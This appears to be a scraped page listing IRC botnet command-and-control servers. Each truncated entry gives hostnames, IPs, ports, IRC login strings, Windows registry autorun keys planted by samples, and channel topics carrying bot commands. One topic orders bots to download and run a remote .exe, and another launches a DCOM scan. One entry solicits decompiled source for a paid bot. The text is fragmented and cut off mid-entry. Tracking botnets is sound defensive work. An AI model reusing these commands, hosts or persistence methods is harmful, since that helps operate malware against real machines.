Unknown ConnectionsHost By Name:Requested Host: wormbot.netResulting Address: 92.241.168.85Connection Established: 0Socket: 0UDP ConnectionsSend DatagramRemote Address 92.241.168.85Remote Port: 5070Size: 7Receive DatagramLocal Port: 0Remote Address 92.241.168.85Remote Port: 5070Size: 0Plain Communication DataSendDump Line:Off Set: $0000Dump: 61 E5 6A 7C E1 6C A3 ASCII: a.j|.l.Transport Protocol: UDPRemote Address: 92.241.168.85Remote Port: 5070Protocol: UnknownConnection Established: 1Socket: 2736 Open KeysKey: HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonQuantity: 10Key:Read more...
bydvwqcdw.com
Remote Host Port Numberbydvwqcdw.com 8090 Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] + Taskman = “C:RECYCLERS-1-5-21-2344348871-565435639-736567348-2995azmit32.exe” so that azmit32.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + winprocsm = “C:RECYCLERS-1-5-21-2344348871-565435639-736567348-2995azmit32.exe” so that azmit32.exe runs every time Windows starts o [HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWinlogon] + Shell = “explorer.exe,C:RECYCLERS-1-5-21-2344348871-565435639-736567348-2995azmit32.exe” so that azmit32.exe runs everyRead more...
xmmx.ax.lt
Remote Host Port Numberxmmx.ax.lt 443 PASS ddositNICK qasyiyUSER ocwbzy “” “yht” :ocwbzy Registry Modifications * The following Registry Key was created: o HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{08B0E5C0-4FCB-11CF-AAX5-00401C608512} * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive SetupInstalled Components{08B0E5C0-4FCB-11CF-AAX5-00401C608512}] + StubPath = “c:subidondeservices.exe” so that services.exe runs every time Windows starts Server : irc.ux0.com [Unreal3.2-beta19]Created : Sun FebRead more...
butterfly.BigMoney.biz(iserdos bfbot Pro costs 800 euro)
this is bfbot PRO from iserdo if someone can revert the exe to have the source pm me – DNS Queries: butterfly.BigMoney.biz DNS_TYPE_A 62.128.52.191 1 butterfly.sinip.es DNS_TYPE_A 200.74.244.84 1 qwertasdfg.sinip.es DNS_TYPE_A 76.73.56.12 1 UDP Traffic: 76.73.56.12:133662.128.52.191:1336200.74.244.84:1336 here anubis analyse of exe filehttp://anubis.iseclab.org/?action=result&task_id=1185bc701aeba0454f13d53c605878087&format=html
Server : irc.lulz.ee
Remote Host Port Numbervteamunix.info 51987 00000000 | 4E49 434B 2070 4C61 6755 657B 5350 4C4F | NICK pLagUe{SPLO00000010 | 6954 7D37 3738 3332 0D0A 5553 4552 2053 | iT}77832..USER S00000020 | 6E69 7061 202A 206F 6B20 0334 0254 6561 | nipa * ok .4.Tea00000030 | 4D20 556E 6958 2062 3061 7420 302E 340D | MRead more...
Secret2.Virus.Gov [Crew]
Remote Host Port Numberrelax.helldark.biz 3211 00000000 | 5041 5353 2056 6972 7573 0D0A 4E49 434B | PASS Virus..NICK00000010 | 2056 6972 5573 2D63 6776 656F 6A61 730D | VirUs-cgveojas.00000020 | 0A55 5345 5220 5669 7255 7320 2222 2022 | .USER VirUs “” “00000030 | 6A63 7222 203A 2003 322C 3102 0334 4961 | jcr” :Read more...
218.61.22.10
Remote Host Port Number218.29.54.25 80218.61.22.10 3838 USER okjvey okjvey okjvey :wrnqhyrehhyqiijkNICK FBWtqIfUMODE FBWtqIfU +xiJOIN ##pi##USERHOST FBWtqIfUMODE ##pi## +smntu * The following ports were open in the system: Port Protocol Process69 UDP algs.exe (%System%algs.exe)1055 TCP algs.exe (%System%algs.exe)37448 TCP algs.exe (%System%algs.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Application Layer Gateway ServiceRead more...
irc.kickr0x.net
Remote Host Port Number94.102.208.149 4244 NICK pLagUe{Sion Lloyd}45858NICK pLagUe{Sion Lloyd}18662NICK pLagUe{Sion Lloyd}78460NICK pLagUe{Sion Lloyd}94983NICK pLagUe{Sion Lloyd}01890NICK pLagUe{Sion Lloyd}43121NICK pLagUe{Sion Lloyd}39280NICK pLagUe{Sion Lloyd}76613NICK pLagUe{Sion Lloyd}89738NICK pLagUe{Sion Lloyd}56398NICK pLagUe{Sion Lloyd}82894NICK pLagUe{Sion Lloyd}82039NICK pLagUe{Sion Lloyd}87885NICK pLagUe{Sion Lloyd}23853NICK pLagUe{Sion Lloyd}01645NICK pLagUe{Sion Lloyd}88666NICK pLagUe{Sion Lloyd}36740NICK pLagUe{Sion Lloyd}54177NICK pLagUe{Sion Lloyd}80205NICK pLagUe{Sion Lloyd}14627 * The following ports were open in the system:Read more...
tx.mostafaaljaafari.net
67.43.232.36:8080Nick: FpNYgjKTVUsername: ngyccnJoined Channel: #rstn2Channel Topic for Channel #rstn2: “* ipscan s.s.s dcom2 -f -s” Now talking in ##xddcTopic On: [ ##xddc ] [ =8LPa5Tc/JNnWJsAJcagjKomScfm2btA5eeTLxUQYDXDiga2dtRqWYxFCwJsxNfkrA5u+uhB9a8rfqGPPhuQpB4kE+yippKgpkDmL8Ip ]Topic By: [ always ]Modes11 On: [ ##xddc ] [ +smntSMCu ] Now talking in #xddc1Topic On: [ #xddc1 ] [ * download http://idfc.info/nadnad.exe -e -f -s ]Topic By: [Read more...
pwnbot.no-ip.biz
Remote Host Port Number24.33.149.209 6667 NICK n-023721USER pibkwl 0 0 :n-023721USERHOST n-023721MODE n-023721 -x+BJOIN #bots password Memory Modifications * There was a new process created in the system: Process Name Process Filename Main Module Sizecuiham.exe %System%cuiham.exe 503 808 bytes * The following ports were open in the system: Port Protocol Process113 TCP cuiham.exe (%System%cuiham.exe)1054 TCPRead more...